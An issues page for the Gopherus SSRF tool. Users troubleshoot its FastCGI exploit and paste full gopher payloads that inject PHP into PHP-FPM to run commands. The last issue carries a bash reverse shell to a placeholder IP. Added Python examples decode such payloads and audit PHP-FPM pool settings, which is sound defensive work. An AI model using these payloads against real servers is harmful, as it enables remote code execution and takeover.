tarunkant / gopherus
This tool generates gopher link for exploiting SSRF and gaining RCE in various servers
License: MIT License
Hi,
I've been testing the fastcgi exploit in a local VM but I am unable to get it to work.
PHP-FPM is listening on port 9000
[vagrant@localhost ~]$ netstat -tunapl | grep 9000
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 127.0.0.1:9000 0.0.0.0:* LISTEN -
tcp 0 0 127.0.0.1:56488 127.0.0.1:9000 TIME_WAIT -
[vagrant@localhost ~]$ sudo grep -ri listen /etc/php-fpm.d/www.conf
; - 'listen' (unixsocket)
; 'ip.add.re.ss:port' - to listen on a TCP socket to a specific address on
; 'port' - to listen on a TCP socket to all addresses on a
; '/path/to/unix/socket' - to listen on a unix socket.
listen = 127.0.0.1:9000
; Set listen(2) backlog.
;listen.backlog = 128
;listen.owner = nobody
listen.owner = apache
;listen.group = nobody
listen.group = apache
listen.mode = 0660
; PHP FCGI (5.2.2+). Makes sense only with a tcp listening socket. Each address
listen.allowed_clients = 127.0.0.1
; listen queue - the number of request in the queue of pending
; connections (see backlog in listen(2));
; max listen queue - the maximum number of requests in the queue
; listen queue len - the size of the socket queue of pending connections;
; listen queue: 0
; max listen queue: 1
; listen queue len: 42
I've generated the payload and executed it as follows
[vagrant@localhost Gopherus]$ pwd
/home/vagrant/Gopherus
[vagrant@localhost Gopherus]$ cat index.php
<?php
echo 'HELLO WORLD' . PHP_EOL;
[vagrant@localhost Gopherus]$ gopherus --exploit fastcgi
________ .__
/ _____/ ____ ______ | |__ ___________ __ __ ______
/ \ ___ / _ \\____ \| | \_/ __ \_ __ \ | \/ ___/
\ \_\ ( <_> ) |_> > Y \ ___/| | \/ | /\___ \
\______ /\____/| __/|___| /\___ >__| |____//____ >
\/ |__| \/ \/ \/
author: $_SpyD3r_$
Give one file name which should be surely present in the server (prefer .php file)
if you don't know press ENTER we have default one: /home/vagrant/Gopherus/index.php
Terminal command to run: ls
Your gopher link is ready to do SSRF:
gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
-----------Made-by-SpyD3r-----------
[vagrant@localhost Gopherus]$ curl -v gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
* About to connect() to 127.0.0.1 port 9000 (#0)
* Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 9000 (#0)
curl just hangs until I eventually send it a SIGINT.
Any help would be much appreciated.
Hi,
I'm a student in the Republic of Korea.
I'm studying cyber security.
Thanks to the tool you made recently, I solved one CTF problem well.
But there are some problems with the shell code you made (a.k.a. install.sh).
If you look at the picture below, you can see an error.
The server I am currently using is Ubuntu 20.04.
If you look at the picture below, pip2 is not supported in that environment.
Operating systems and tools are updated every year.
Accordingly, it seems that the code needs to be modified.
A PHP website vulnerable to SSRF that uses the curl_setopt() function to load files will throw the following error, due to the null byte in the URL generated by exploit MySql and exploit FastCGI, making the attack void:
PHP Fatal error: Uncaught ValueError: curl_setopt(): cURL option must not contain any null bytes
Please replace
"\r\n " with "\r\n"
If needed, see https://pastebin.com/raw/Va3CH3tK
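The decoder below is an added example; it is not part of Gopherus and not code from either of the two reporters above. It serves the first report (the generated link that curl sends to PHP-FPM on port 9000) and the report just above (the null-byte error from curl_setopt()): given a gopher link captured in proxy or WAF logs, it percent-decodes the selector, walks the FastCGI records, and lists the parameters and script body that would reach PHP-FPM, plus whether the decoded bytes contain NULs, which PHP's curl_setopt() refuses. The sample URL is the one quoted in the first report; the finding messages are this example's own wording.

```python
"""Decode a gopher:// SSRF payload into the FastCGI records it carries."""
import struct
from urllib.parse import unquote_to_bytes

# Record types from the FastCGI specification.
FCGI_BEGIN_REQUEST, FCGI_PARAMS, FCGI_STDIN = 1, 4, 5
RECORD_NAMES = {1: "BEGIN_REQUEST", 4: "PARAMS", 5: "STDIN"}

# The gopher link generated in the first report on this page (copied verbatim).
SAMPLE_URL = "gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%0D%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%20SCRIPT_FILENAME/home/vagrant/Gopherus/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00"


def gopher_payload(url: str) -> bytes:
    """Bytes a gopher client sends for this URL: the selector after the
    one-character item type ('_'), percent-decoded (curl then appends CRLF)."""
    if not url.startswith("gopher://"):
        raise ValueError("not a gopher URL")
    path = url[len("gopher://"):].split("/", 1)[1]   # strip host:port
    return unquote_to_bytes(path[1:])                # drop the item-type character


def iter_records(data: bytes):
    """Yield (type, request_id, content) for each FastCGI record (8-byte header)."""
    offset = 0
    while offset + 8 <= len(data):
        version, rtype, req_id, clen, plen, _ = struct.unpack("!BBHHBB", data[offset:offset + 8])
        if version != 1:
            raise ValueError(f"unexpected FastCGI version {version} at offset {offset}")
        content = data[offset + 8:offset + 8 + clen]
        if len(content) != clen:
            raise ValueError(f"truncated record at offset {offset}")
        yield rtype, req_id, content
        offset += 8 + clen + plen           # skip content and padding


def parse_params(content: bytes) -> dict:
    """Decode FastCGI name-value pairs: a length is 1 byte if < 128,
    otherwise 4 bytes big-endian with the top bit set."""
    params, i = {}, 0

    def read_len() -> int:
        nonlocal i
        if content[i] < 0x80:
            n, i = content[i], i + 1
        else:
            n, i = struct.unpack("!I", content[i:i + 4])[0] & 0x7FFFFFFF, i + 4
        return n

    while i < len(content):
        nlen, vlen = read_len(), read_len()
        name = content[i:i + nlen].decode("latin-1")
        value = content[i + nlen:i + nlen + vlen].decode("latin-1")
        params[name] = value
        i += nlen + vlen
    return params


def analyze(url: str) -> dict:
    """Summarise what the payload asks PHP-FPM to do."""
    data = gopher_payload(url)
    result = {"records": [], "role": None, "params": {}, "stdin": b"", "findings": []}
    for rtype, _req_id, content in iter_records(data):
        result["records"].append(RECORD_NAMES.get(rtype, str(rtype)))
        if rtype == FCGI_BEGIN_REQUEST:
            result["role"] = struct.unpack("!H", content[:2])[0]   # 1 = FCGI_RESPONDER
        elif rtype == FCGI_PARAMS and content:   # an empty PARAMS record just ends the list
            result["params"].update(parse_params(content))
        elif rtype == FCGI_STDIN:
            result["stdin"] += content

    p, f = result["params"], result["findings"]
    php_value = p.get("PHP_VALUE", "")
    if "auto_prepend_file" in php_value and "php://input" in php_value:
        f.append("PHP_VALUE sets auto_prepend_file=php://input: the STDIN body is executed as PHP")
    if "disable_functions" in php_value:
        f.append("PHP_VALUE attempts to override disable_functions")
    if "SCRIPT_FILENAME" in p:
        f.append(f"target script: {p['SCRIPT_FILENAME']}")
    if b"\x00" in data:
        f.append("decoded payload contains NUL bytes; PHP's curl_setopt() rejects such strings")
    return result


if __name__ == "__main__":
    r = analyze(SAMPLE_URL)
    print("records:", r["records"], "role:", r["role"])
    for k, v in r["params"].items():
        print(f"  {k} = {v!r}")
    print("stdin:", r["stdin"])
    print("\n".join("! " + x for x in r["findings"]))
```

Run stand-alone it prints four records (BEGIN_REQUEST, PARAMS, an empty PARAMS terminator, STDIN), the eight parameters, and a 54-byte STDIN body that matches the CONTENT_LENGTH parameter; the same walk works on any other captured gopher-to-FastCGI link.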
Your tool/software has been inventoried on Rawsec's CyberSecurity Inventory.
https://inventory.rawsec.ml/tools.html#Gopherus
An inventory of tools and resources about CyberSecurity. This inventory aims to help people to find everything related to CyberSecurity.
More details about features here.
Note: the inventory is a FLOSS (Free, Libre and Open-Source Software) project.
Mainly because this is giving visibility to your tool, more and more people are using the Rawsec's CyberSecurity Inventory, this helps them find what they need.
The badge shows to your community that you are inventoried. This also shows you care about your project and want it growing, that your tool is not an abandonware.
Feel free to claim your badge here: http://inventory.rawsec.ml/features.html#badges, it looks like this, but there are several styles available.
If you want to thank us, you can help make the project better known by tweeting about it! For example:
That's all, this message is just to notify you if you care.
There's a good chance of finding phar files in standard locations according to their installation guides.
E.g.
Currently I get the error below when trying to use it with /usr/local/bin/composer
curl gopher://127.0.0.1:9000/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%04%04%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%02CONTENT_LENGTH54%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/local/bin/composer%0D%01DOCUMENT_ROOT/%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%006%04%00%3C%3Fphp%20system%28%27ls%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
_Access to the script '/usr/local/bin/composer' has been denied (see security.limit_extensions)
jStatus: 403 Forbidden
X-Powered-By: PHP/7.1.24
Content-type: text/html; charset=UTF-8
Access denied.
5 G%
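The "Access to the script ... has been denied (see security.limit_extensions)" response above is PHP-FPM's own guard at work. The audit script below is an added example, not part of Gopherus or of the report: it reads an ini-style pool file and flags the settings that decide whether an SSRF can hand arbitrary files to the interpreter. The two embedded pool configs are constructed samples modelled on the www.conf excerpt in the first report; the finding ids and messages are this example's own. The setting semantics follow the PHP-FPM documentation: security.limit_extensions defaults to ".php" and an empty value allows every extension, and listen.allowed_clients only applies to TCP listeners.

```python
"""Audit a PHP-FPM pool config for settings that let an SSRF reach FastCGI."""

# Constructed sample: TCP listener on loopback, every extension allowed.
WEAK_POOL = """\
[www]
listen = 127.0.0.1:9000
listen.allowed_clients = 127.0.0.1
; empty value: every extension is allowed
security.limit_extensions =
"""

# Constructed sample: unix socket with a restrictive mode, .php only.
HARDENED_POOL = """\
[www]
listen = /run/php-fpm/www.sock
listen.owner = apache
listen.group = apache
listen.mode = 0660
security.limit_extensions = .php
"""


def parse_pool(text: str) -> dict:
    """Return key -> value for an ini-style pool file, dropping ';' comments,
    blank lines and [section] headers."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or line.startswith("[") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip()] = value.strip()
    return settings


def audit_pool(text: str) -> list:
    """Return [(finding_id, message)] for risky settings; [] means nothing flagged."""
    s = parse_pool(text)
    findings = []
    listen = s.get("listen", "")
    # Simplification: a value starting with '/' is a unix socket, anything else is TCP.
    is_tcp = bool(listen) and not listen.startswith("/")

    if is_tcp:
        clients = [c.strip() for c in s.get("listen.allowed_clients", "").split(",") if c.strip()]
        if not clients:
            findings.append(("tcp-no-allowlist",
                             f"TCP listener {listen} accepts FastCGI requests from any client"))
        elif all(c in ("127.0.0.1", "::1") for c in clients):
            findings.append(("tcp-loopback-only",
                             f"TCP listener {listen}: a loopback allowlist does not stop SSRF "
                             "from a web app on the same host; prefer a unix socket"))

    ext = s.get("security.limit_extensions", ".php")   # FPM default
    if ext == "":
        findings.append(("limit-extensions-empty",
                         "security.limit_extensions is empty: any readable file can be "
                         "handed to the PHP interpreter"))
    elif set(ext.split()) - {".php"}:
        findings.append(("limit-extensions-extra",
                         f"security.limit_extensions allows non-.php files: {ext}"))

    if listen and not is_tcp:
        mode = s.get("listen.mode", "0660")   # FPM default
        if int(mode, 8) & 0o007:
            findings.append(("socket-world-access",
                             f"unix socket mode {mode} grants access to all local users"))
    return findings


if __name__ == "__main__":
    for label, cfg in (("weak", WEAK_POOL), ("hardened", HARDENED_POOL)):
        print(f"{label}: {audit_pool(cfg) or 'no findings'}")
```

The weak sample reproduces the shape of the first report (loopback TCP listener with a loopback allowlist) and is flagged twice; the hardened sample produces no findings. The check is deliberately conservative: it does not touch chroot, user/group or pm settings, only what governs which files FastCGI clients can execute and who can be such a client.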
File "/home/sajeesh/Gopherus/gopherus.py", line 28
print colors.green + """
^^^^^^^^^^^^^^^^^^^^^^^^
SyntaxError: Missing parentheses in call to 'print'. Did you mean print(...)?
I use gopherus --exploit fastcgi to get RCE which executes /bin/bash -i >& /dev/tcp/IP/PORT 0>&1.
Result gopher://127.0.0.1:9001/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH102%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/usr/share/php/PEAR.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00f%04%00%3C%3Fphp%20system%28%27/bin/bash%20-i%20%3E%26%20/dev/tcp/IP/PORT%200%3E%261%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00
I expect to get a reverse shell when running curl ABOVE_GOPHER_LINK, but nothing happens instead.
Can anyone explain this to me, please?